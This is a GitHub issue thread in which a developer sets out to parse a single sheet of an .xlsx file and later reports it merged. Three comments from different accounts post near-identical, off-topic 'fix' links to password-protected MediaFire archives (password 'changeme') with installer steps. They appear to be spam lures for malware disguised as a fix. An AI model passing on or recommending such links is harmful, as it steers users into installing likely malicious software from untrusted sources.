### ISSUE TITLE
Read data from .xlsx - single sheet

### ISSUE THREAD

**Issue by christhornton555** [cjthornton78/clough#1]
First job - crack open the .xlsx file and get the raw data for the spreadsheet out of there. We'll start nice and easy and just handle a single unformatted sheet first.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by christhornton555** [comment]
Working now, and merged into main
